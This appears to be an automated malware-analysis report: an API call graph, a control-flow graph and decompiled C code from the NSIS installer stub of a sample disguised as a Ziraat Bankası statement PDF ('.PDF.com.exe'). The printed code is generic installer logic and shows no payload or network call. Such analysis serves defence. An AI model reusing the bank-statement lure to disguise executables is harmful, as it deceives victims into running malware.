4574 4021aa 4575 402da6 17 API calls 4574->4575 4576 4021b1 4575->4576 4577 402da6 17 API calls 4576->4577 4578 4021bb 4577->4578 4579 402da6 17 API calls 4578->4579 4580 4021c5 4579->4580 4581 402da6 17 API calls 4580->4581 4582 4021cf 4581->4582 4583 402da6 17 API calls 4582->4583 4584 4021d9 4583->4584 4585 402218 CoCreateInstance 4584->4585 4586 402da6 17 API calls 4584->4586 4589 402237 4585->4589 4586->4585 4587 401423 24 API calls 4588 4022f6 4587->4588 4589->4587 4589->4588 4597 401a30 4598 402da6 17 API calls 4597->4598 4599 401a39 ExpandEnvironmentStringsW 4598->4599 4600 401a4d 4599->4600 4602 401a60 4599->4602 4601 401a52 lstrcmpW 4600->4601 4600->4602 4601->4602 4603 405031 GetDlgItem GetDlgItem 4604 405083 7 API calls 4603->4604 4608 4052a8 4603->4608 4605 40512a DeleteObject 4604->4605 4606 40511d SendMessageW 4604->4606 4607 405133 4605->4607 4606->4605 4609 40516a 4607->4609 4611 4066a5 17 API calls 4607->4611 4625 40538a 4608->4625 4635 405317 4608->4635 4657 404f7f SendMessageW 4608->4657 4612 4045c4 18 API calls 4609->4612 4610 405436 4614 405440 SendMessageW 4610->4614 4615 405448 4610->4615 4616 40514c SendMessageW SendMessageW 4611->4616 4617 40517e 4612->4617 4613 40529b 4621 40462b 8 API calls 4613->4621 4614->4615 4627 405461 4615->4627 4628 40545a ImageList_Destroy 4615->4628 4632 405471 4615->4632 4616->4607 4618 4045c4 18 API calls 4617->4618 4636 40518f 4618->4636 4619 4053e3 SendMessageW 4619->4613 4624 4053f8 SendMessageW 4619->4624 4620 40537c SendMessageW 4620->4625 4626 405637 4621->4626 4623 4055eb 4623->4613 4633 4055fd ShowWindow GetDlgItem ShowWindow 4623->4633 4630 40540b 4624->4630 4625->4610 4625->4613 4625->4619 4631 40546a GlobalFree 4627->4631 4627->4632 4628->4627 4629 40526a GetWindowLongW SetWindowLongW 4634 405283 4629->4634 4641 40541c SendMessageW 4630->4641 4631->4632 4632->4623 4650 4054ac 4632->4650 4662 404fff 4632->4662 4633->4613 4637 4052a0 4634->4637 4638 405288 ShowWindow 4634->4638 4635->4620 4635->4625 4636->4629 4640 4051e2 SendMessageW 4636->4640 4642 405265 4636->4642 4644 405220 SendMessageW 4636->4644 4645 405234 SendMessageW 4636->4645 4656 4045f9 SendMessageW 4637->4656 4655 4045f9 SendMessageW 4638->4655 4640->4636 4641->4610 4642->4629 4642->4634 4644->4636 4645->4636 4647 4055b6 4648 4055c1 InvalidateRect 4647->4648 4651 4055cd 4647->4651 4648->4651 4649 4054da SendMessageW 4654 4054f0 4649->4654 4650->4649 4650->4654 4651->4623 4671 404f3a 4651->4671 4653 405564 SendMessageW SendMessageW 4653->4654 4654->4647 4654->4653 4655->4613 4656->4608 4658 404fa2 GetMessagePos ScreenToClient SendMessageW 4657->4658 4659 404fde SendMessageW 4657->4659 4660 404fd6 4658->4660 4661 404fdb 4658->4661 4659->4660 4660->4635 4661->4659 4674 406668 lstrcpynW 4662->4674 4664 405012 4675 4065af wsprintfW 4664->4675 4666 40501c 4667 40140b 2 API calls 4666->4667 4668 405025 4667->4668 4676 406668 lstrcpynW 4668->4676 4670 40502c 4670->4650 4677 404e71 4671->4677 4673 404f4f 4673->4623 4674->4664 4675->4666 4676->4670 4678 404e8a 4677->4678 4679 4066a5 17 API calls 4678->4679 4680 404eee 4679->4680 4681 4066a5 17 API calls 4680->4681 4682 404ef9 4681->4682 4683 4066a5 17 API calls 4682->4683 4684 404f0f lstrlenW wsprintfW SetDlgItemTextW 4683->4684 4684->4673 4690 4023b2 4691 4023c0 4690->4691 4692 4023ba 4690->4692 4694 402da6 17 API calls 4691->4694 4695 4023ce 4691->4695 4693 402da6 17 API calls 4692->4693 4693->4691 4694->4695 4696 4023dc 4695->4696 4697 402da6 17 API calls 4695->4697 4698 402da6 17 API calls 4696->4698 4697->4696 4699 4023e5 WritePrivateProfileStringW 4698->4699 4700 404734 lstrlenW 4701 404753 4700->4701 4702 404755 WideCharToMultiByte 4700->4702 4701->4702 4703 402434 4704 402467 4703->4704 4705 40243c 4703->4705 4707 402da6 17 API calls 4704->4707 4706 402de6 17 API calls 4705->4706 4708 402443 4706->4708 4709 40246e 4707->4709 4711 402da6 17 API calls 4708->4711 4712 40247b 4708->4712 4714 402e64 4709->4714 4713 402454 RegDeleteValueW RegCloseKey 4711->4713 4713->4712 4715 402e78 4714->4715 4717 402e71 4714->4717 4715->4717 4718 402ea9 4715->4718 4717->4712 4719 4064d5 RegOpenKeyExW 4718->4719 4720 402ed7 4719->4720 4721 402ee7 RegEnumValueW 4720->4721 4722 402f0a 4720->4722 4729 402f81 4720->4729 4721->4722 4723 402f71 RegCloseKey 4721->4723 4722->4723 4724 402f46 RegEnumKeyW 4722->4724 4725 402f4f RegCloseKey 4722->4725 4727 402ea9 6 API calls 4722->4727 4723->4729 4724->4722 4724->4725 4726 406a35 5 API calls 4725->4726 4728 402f5f 4726->4728 4727->4722 4728->4729 4730 402f63 RegDeleteKeyW 4728->4730 4729->4717 4730->4729 4731 401735 4732 402da6 17 API calls 4731->4732 4733 40173c SearchPathW 4732->4733 4734 401757 4733->4734 4735 404ab5 4736 404ae1 4735->4736 4737 404af2 4735->4737 4796 405cac GetDlgItemTextW 4736->4796 4739 404afe GetDlgItem 4737->4739 4745 404b5d 4737->4745 4741 404b12 4739->4741 4740 404aec 4743 4068ef 5 API calls 4740->4743 4744 404b26 SetWindowTextW 4741->4744 4752 405fe2 4 API calls 4741->4752 4742 404c41 4746 404df0 4742->4746 4798 405cac GetDlgItemTextW 4742->4798 4743->4737 4748 4045c4 18 API calls 4744->4748 4745->4742 4745->4746 4749 4066a5 17 API calls 4745->4749 4751 40462b 8 API calls 4746->4751 4753 404b42 4748->4753 4754 404bd1 SHBrowseForFolderW 4749->4754 4750 404c71 4755 40603f 18 API calls 4750->4755 4756 404e04 4751->4756 4757 404b1c 4752->4757 4758 4045c4 18 API calls 4753->4758 4754->4742 4759 404be9 CoTaskMemFree 4754->4759 4760 404c77 4755->4760 4757->4744 4763 405f37 3 API calls 4757->4763 4761 404b50 4758->4761 4762 405f37 3 API calls 4759->4762 4799 406668 lstrcpynW 4760->4799 4797 4045f9 SendMessageW 4761->4797 4765 404bf6 4762->4765 4763->4744 4768 404c2d SetDlgItemTextW 4765->4768 4772 4066a5 17 API calls 4765->4772 4767 404b56 4770 406a35 5 API calls 4767->4770 4768->4742 4769 404c8e 4771 406a35 5 API calls 4769->4771 4770->4745 4779 404c95 4771->4779 4773 404c15 lstrcmpiW 4772->4773 4773->4768 4776 404c26 lstrcatW 4773->4776 4774 404cd6 4800 406668 lstrcpynW 4774->4800 4776->4768 4777 404cdd 4778 405fe2 4 API calls 4777->4778 4780 404ce3 GetDiskFreeSpaceW 4778->4780 4779->4774 4782 405f83 2 API calls 4779->4782 4784 404d2e 4779->4784 4783 404d07 MulDiv 4780->4783 4780->4784 4782->4779 4783->4784 4785 404d9f 4784->4785 4786 404f3a 20 API calls 4784->4786 4787 404dc2 4785->4787 4789 40140b 2 API calls 4785->4789 4788 404d8c 4786->4788 4801 4045e6 EnableWindow 4787->4801 4791 404da1 SetDlgItemTextW 4788->4791 4792 404d91 4788->4792 4789->4787 4791->4785 4794 404e71 20 API calls 4792->4794 4793 404dde 4793->4746 4795 404a0e SendMessageW 4793->4795 4794->4785 4795->4746 4796->4740 4797->4767 4798->4750 4799->4769 4800->4777 4801->4793 4802 401d38 4803 402d84 17 API calls 4802->4803 4804 401d3f 4803->4804 4805 402d84 17 API calls 4804->4805 4806 401d4b GetDlgItem 4805->4806 4807 402638 4806->4807 4808 4014b8 4809 4014be 4808->4809 4810 401389 2 API calls 4809->4810 4811 4014c6 4810->4811 4812 40563e 4813 405662 4812->4813 4814 40564e 4812->4814 4817 40566a IsWindowVisible 4813->4817 4823 405681 4813->4823 4815 405654 4814->4815 4816 4056ab 4814->4816 4819 404610 SendMessageW 4815->4819 4818 4056b0 CallWindowProcW 4816->4818 4817->4816 4820 405677 4817->4820 4821 40565e 4818->4821 4819->4821 4822 404f7f 5 API calls 4820->4822 4822->4823 4823->4818 4824 404fff 4 API calls 4823->4824 4824->4816 4825 40263e 4826 402652 4825->4826 4827 40266d 4825->4827 4828 402d84 17 API calls 4826->4828 4829 402672 4827->4829 4830 40269d 4827->4830 4837 402659 4828->4837 4831 402da6 17 API calls 4829->4831 4832 402da6 17 API calls 4830->4832 4834 402679 4831->4834 4833 4026a4 lstrlenW 4832->4833 4833->4837 4842 40668a WideCharToMultiByte 4834->4842 4836 40268d lstrlenA 4836->4837 4838 4026d1 4837->4838 4839 4026e7 4837->4839 4841 406239 5 API calls 4837->4841 4838->4839 4840 40620a WriteFile 4838->4840 4840->4839 4841->4838 4842->4836

                                                  Executed Functions

                                                  Function 00403640 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450stringfilecomCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                  C-Code - Quality: 78%
                                                  			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"";
				E00406668(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				_t250 = L"\"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"" - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405F64(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(L"\"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"", _t188);
											if(_t218 < L"\"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\frontdesk\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\frontdesk\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t219);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t221);
												E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                                                  0x0040364e
                                                  0x0040364f
                                                  0x00403656
                                                  0x00403659
                                                  0x00403660
                                                  0x00403663
                                                  0x00403676
                                                  0x0040367c
                                                  0x0040367f
                                                  0x00403682
                                                  0x00403690
                                                  0x00403698
                                                  0x004036a3
                                                  0x004036bc
                                                  0x004036be
                                                  0x004036c6
                                                  0x004036c6
                                                  0x004036d1
                                                  0x004036d3
                                                  0x004036d3
                                                  0x004036e8
                                                  0x0040370d
                                                  0x0040371b
                                                  0x0040371e
                                                  0x00403725
                                                  0x0040372c
                                                  0x0040372c
                                                  0x00403725
                                                  0x0040372e
                                                  0x00403733
                                                  0x00403734
                                                  0x00403740
                                                  0x00403744
                                                  0x0040374b
                                                  0x00403759
                                                  0x0040375e
                                                  0x00403765
                                                  0x00403769
                                                  0x0040376d
                                                  0x0040376f
                                                  0x0040376f
                                                  0x0040376d
                                                  0x00403776
                                                  0x0040377d
                                                  0x00403783
                                                  0x0040379b
                                                  0x004037ab
                                                  0x004037b0
                                                  0x004037b6
                                                  0x004037bd
                                                  0x004037c4
                                                  0x004037c6
                                                  0x004037c7
                                                  0x004037d1
                                                  0x004037d8
                                                  0x004037da
                                                  0x004037dc
                                                  0x004037dc
                                                  0x004037ef
                                                  0x004037f1
                                                  0x004038eb
                                                  0x004038eb
                                                  0x004038ee
                                                  0x004038f1
                                                  0x00000000
                                                  0x00000000
                                                  0x004037fb
                                                  0x004037fc
                                                  0x004037ff
                                                  0x00403808
                                                  0x00403808
                                                  0x0040380b
                                                  0x0040380e
                                                  0x00403811
                                                  0x00403814
                                                  0x00403814
                                                  0x00403814
                                                  0x00403815
                                                  0x00403819
                                                  0x004038d9
                                                  0x004038e2
                                                  0x004038e4
                                                  0x004038e7
                                                  0x004038ea
                                                  0x004038ea
                                                  0x004038ea
                                                  0x00000000
                                                  0x0040381f
                                                  0x00403820
                                                  0x00403821
                                                  0x00403825
                                                  0x0040383f
                                                  0x00403846
                                                  0x00403859
                                                  0x0040385a
                                                  0x0040386f
                                                  0x00403874
                                                  0x00403876
                                                  0x00403878
                                                  0x00403894
                                                  0x0040389b
                                                  0x004038ae
                                                  0x004038af
                                                  0x004038c4
                                                  0x004038ca
                                                  0x004038cc
                                                  0x004038ce
                                                  0x004038d6
                                                  0x004038d8
                                                  0x00000000
                                                  0x004038d8
                                                  0x004038d2
                                                  0x004038d4
                                                  0x004038f9
                                                  0x004038fd
                                                  0x00403906
                                                  0x0040390b
                                                  0x00403911
                                                  0x0040391c
                                                  0x0040391e
                                                  0x00403923
                                                  0x00403925
                                                  0x0040397d
                                                  0x00403982
                                                  0x0040398b
                                                  0x00403992
                                                  0x00403995
                                                  0x00403b6c
                                                  0x00403b6c
                                                  0x00403b71
                                                  0x00403b7a
                                                  0x00403b97
                                                  0x00403c0f
                                                  0x00403c0f
                                                  0x00403c17
                                                  0x00403c19
                                                  0x00403c19
                                                  0x00403c1f
                                                  0x00403c1f
                                                  0x00403bae
                                                  0x00403bba
                                                  0x00403bcb
                                                  0x00403bd2
                                                  0x00403bd9
                                                  0x00403bd9
                                                  0x00403be1
                                                  0x00403bed
                                                  0x00403bfb
                                                  0x00403c06
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403bef
                                                  0x00403bef
                                                  0x00403bf0
                                                  0x00403bf2
                                                  0x00403bf3
                                                  0x00403bf4
                                                  0x00403bf9
                                                  0x00403c08
                                                  0x00403c0a
                                                  0x00000000
                                                  0x00403c0a
                                                  0x00000000
                                                  0x00403bf9
                                                  0x00403bed
                                                  0x00403b84
                                                  0x00403b8b
                                                  0x00403b8b
                                                  0x004039a1
                                                  0x00403a48
                                                  0x00403a48
                                                  0x00403a54
                                                  0x00000000
                                                  0x00403a54
                                                  0x004039b2
                                                  0x004039ba
                                                  0x00403a0c
                                                  0x00403a0c
                                                  0x00403a12
                                                  0x00403a19
                                                  0x00403a67
                                                  0x00403a69
                                                  0x00403a6e
                                                  0x00403a70
                                                  0x00403a78
                                                  0x00403a78
                                                  0x00403a83
                                                  0x00403a88
                                                  0x00403a8f
                                                  0x00403a95
                                                  0x00403a97
                                                  0x00403b6a
                                                  0x00403b6a
                                                  0x00403b6a
                                                  0x00000000
                                                  0x00403a9d
                                                  0x00403a9d
                                                  0x00403a9f
                                                  0x00403aa0
                                                  0x00403aa9
                                                  0x00403aa2
                                                  0x00403aa2
                                                  0x00403aa2
                                                  0x00403aaf
                                                  0x00403ab7
                                                  0x00403abe
                                                  0x00403ac6
                                                  0x00403ac6
                                                  0x00403ad3
                                                  0x00403adf
                                                  0x00403ae9
                                                  0x00403ae9
                                                  0x00403aeb
                                                  0x00403af2
                                                  0x00403afc
                                                  0x00403b08
                                                  0x00403b0e
                                                  0x00403b14
                                                  0x00403b17
                                                  0x00403b21
                                                  0x00403b27
                                                  0x00403b29
                                                  0x00403b2d
                                                  0x00403b3e
                                                  0x00403b44
                                                  0x00403b49
                                                  0x00403b4b
                                                  0x00403b4e
                                                  0x00403b54
                                                  0x00403b54
                                                  0x00403b4b
                                                  0x00403b29
                                                  0x00403b57
                                                  0x00403b5e
                                                  0x00403b5e
                                                  0x00403b5e
                                                  0x00403b5e
                                                  0x00403b65
                                                  0x00000000
                                                  0x00403b65
                                                  0x00403a97
                                                  0x00403a1b
                                                  0x00403a1e
                                                  0x00403a22
                                                  0x00403a27
                                                  0x00403a29
